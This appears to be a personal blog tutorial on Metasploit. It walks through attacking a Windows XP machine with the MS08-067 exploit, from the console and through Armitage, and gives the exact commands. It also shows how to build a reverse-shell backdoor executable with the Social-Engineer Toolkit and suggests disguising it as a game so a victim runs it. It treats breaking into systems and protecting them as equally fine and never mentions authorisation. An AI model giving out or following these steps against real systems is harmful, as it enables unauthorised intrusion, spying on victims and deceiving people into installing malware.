Beginners Guide to Metasploit

Metaspoilt can run on Linux, Mac OS X and on Windows. It is both a command line interface and a graphical user interface (GUI). The Metasploit Framework can be extended to use external add-ons in multiple languages making it a very powerful tool. Metasploit can be used to test the vulnerability of target systems either to protect them or to break into them. so for this reason be it legitimate or unauthorized activities, it clearly identifies the importance of security.

To exploit a system using the Metasploit Framework you carry out 5 steps:
1. Choose then configuring a pre loaded exploit in the database.
2. Check to see if the target system is susceptible to the exploit.
3. Configuring a payload
4. Encode the payload in order to hide it from an intrusion-prevention system (IPS)
5. Execute the exploit.

In order for you to choose an exploit and a payload, information about the target is required. There are many ways to gain this information from port scanning and OS fingerprinting tools such as Nmap or vulnerability scanners such as Nessus. I'll leave your method of information gathering up to you.


Installation



Installation of the Metasploit framework is dependant on your Operating System and hardware therefore rather than list the ways to install to save covering all eventualities I have provided a link to both windows and Linux installations:

Windows: LINK...
Linux : LINK...

I would however highly recommend that you download Kali-Linux which comes with Metasploit Pro already installed.


Usage



Metasploit is a great tool and a must have for all secutiry/penetration testers. I will show you a few ways in which metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on Kali-Linux exploiting a Windows XP SP3 OS)


Exploit ms08_067_netapi.



How to connect and exploit a target machine using Metasploit Exploit ms08_067_netapi. So first of lets boot up a version of Metasploit, with the cmd msfconsole:

[caption id="attachment_1588" align="alignnone" width="1366"]metasploit start metasploit start[/caption]



Now we need to setup our windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp
3. set RHOST 192.168.0.10 (This IP Address will be your targets IP gained from a scan)
4. exploit (This command carries out the exploit as seen below)

up_f3b11d2adba5aacddbff8d6d351dc579.jpg
All being well you should have connected to the target and carry out a number of commands. Below is the screenshot command.

up_42b5e9e1dd305310dd3e381268aee366.jpg
And thats it easy!!

There are loads of commands to run under this exploit, just type help and a list will be displayed.
Examples are: Recording audio from microphones, screenshots from their webcam, gathering keystrokes and downloading files.


Social engineering example



Next lets see how to gain access to a targets machine using their interaction. Why? I hear you ask, well sometimes its not possible to connect directly for whatever reason lets say "security settings". The following exploit uses the targets interaction to help us gain access.

So first things first bring up a terminal window and type the command: se-toolkit

Then enter option 1 for social engineering attacks

up_dcceac0fd07e2de79d9550df12d9eca3.jpg
Now option 4 to create a payload and listener and enter your IP Address.

up_6de4e27eaf992e55b23837f5b42ff4b5.jpg
Now you need to pick the type of payload, we will go with option 2 - Windows Reverse TCP Meterpreter.

up_b1a7c925ec2e8c73e5ac7b4defb82b49.jpg
Choose option 16 - Backdoor Executable
Leave the port set to 443
(This port is used for secure web browser communication. Data transferred across such connections are highly resistant to eavesdropping and interception which is iroic concidering what we are using it for lol)
And finally start the listener.

up_85e8ddb7059aded3e547ecbad62944e6.jpg
Ok so lets recap, we have just created an executable file with a payload hidden within. The next part is a little tricky you need to send the file to the target computer and get them to execute it. For example call it games and give it a nice icon lol.

Before you send the file navigate to were it was created and right click and properties.

up_c2d9ac296708f9c5a8aaa41bc11ea8b0.jpg
Tick the box to allow the file to be executed as a program

up_23ac654a9aa41b13c3c7c8db56aa8f42.jpg
So now we wait..... once the target executes the program you will get the following:

up_f47fdf41cca0ef93ed9b86a9796ccfd3.jpg
From here on in its the usual Meterpreter > prompt
As before you can now run commands like screenshot or shell.
The target is yours!

up_2a55103dcdec4ac7bd7f2e06c833be6b.jpg


Armitage



We've seen how to use Metasploit via the command line now lets see how to use a graphical version Armitage that lets us achieve the same goal.

Armitage is a GUI way of using metasploit/meterpreter rather than cmd line so lets get started.

First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start ...... this will start the server/database

up_09e7239f76a35fd1aebe692d2ab9c933.jpg

Then type armitage in the terminal window and accept the default values:

up_133b44eb36389ea3e833e65b761ca2ec.jpg
You will probably get a popup asking to start metasploit, click yes
you should now see the following:

up_70a7f1bb1540dc6ad71fc692892641d5.jpg
Dont worry about the connection refused it just takes a while to load.
Now armitage will boot up if it asks you for the attack computer IP enter your IP Address.
Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect)

up_f41941e5c6945f47d4dd3a8e43b3bc29.jpg
From here armitage will scan a range or a sigle IP Address of your choice then present it in the black window. Right click the target and click Scan

up_104aa55005305cce0cc7691b8dd0e27a.jpg
When the scan is complete expand the exploit > windows > smb and double click the ms08_67_netapi

up_c415bc13c15126d5b78705de4113bad0.jpg
This will bring up an attack confirmation window check the details and click launch

up_df156ff747901c8144cf5d1062749aed.jpg
Confirmation of a successful exploit will look like this:

up_af26450c85394599f339d4db79b7b139.jpg
You can now right click the target and perform multiple commands

up_b4440e30bf4172341ab9ea9c7edb975d.jpg
here is an example of the Interact "remote command shell"

up_ad688c74a66aca371d72ce65f8fccb9e.jpg

Websploit



As an added extra Websploit (below) uses exploits from Metasploit and has its own features as well which is used to scan and analysis remote systems in order to find vulnerabilites. If you enjoyed this article please comment and i will do one for Websploit. Thank you.

up_1b990ed5407226003a4ae441d9bebf2b.jpg


Summary



Metasploit is a must have for anyone interested in the world of secutiry, you have just seen a few ways in which it can be used however keep in mind that this has only scratched the surface of the potential of this tool. To find out more please follow the links below.



No comments:

Post a Comment